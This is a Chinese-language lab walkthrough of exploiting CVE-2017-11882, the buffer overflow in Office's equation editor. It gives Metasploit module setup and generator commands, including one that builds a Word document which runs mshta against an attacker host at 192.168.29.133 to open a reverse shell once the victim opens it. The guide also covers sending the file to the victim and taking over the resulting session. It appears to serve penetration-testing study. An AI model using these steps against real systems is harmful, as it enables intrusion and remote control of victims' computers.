CVE-2017-11882信息
CVE-2017-11882属于缓冲区溢出类型漏洞,产生漏洞原因于EQNEDT32.EXE(微软office自带公式编辑器)进程在读入包含MathType的ole数据时,在拷贝公式字体名称(Font Name数据)时没有对名称长度进行校验,导致缓冲区溢出。通过覆盖函数的返回地址,可执行任意代码。
漏洞影响
office 2003 版本
office 2007 版本
office 2010 版本
office 2013 版本
office 2016 版本
分析过程
目标主机:win10安装了office2016软件。

打开msf

搜索模块,发现是手动
我们使用github上面的项目文件


首先下载解压文件

将CVE-2017-11882-metasploit文件夹中的文件复制到以下目录
cp cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/local
cp cve-2017-11882.rtf /usr/share/metasploit-framework/data/exploits
将CVE-2017-11882-master放到kali中

鼠标右键

选择“在这里打开终端”
python2 Command109b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test01.doc
生成测试文件

在主机上打开
测试漏洞是否存在

验证通过
更改反弹shell
打开msf,重新加载模块
msfconsolereload_all
搜索模块
search cve-2017-11882

选择第二个
use exploit/windows/local/cve_2017_11882


设置好参数

exploit执行

返回到这里,我们生成一个反弹shell
python2 Command43b_CVE-2017-11882.py -c "mshta http://192.168.29.133:8080/pl.hta" -o rshell01.doc

将文档发送到目标主机


双击打开

有会话反弹

进入会话,获取主机控制权

sysinfo获取当前系统信息。
测试结束
防御措施
1、及时更新office版本
2、不要点击来源不明的文件
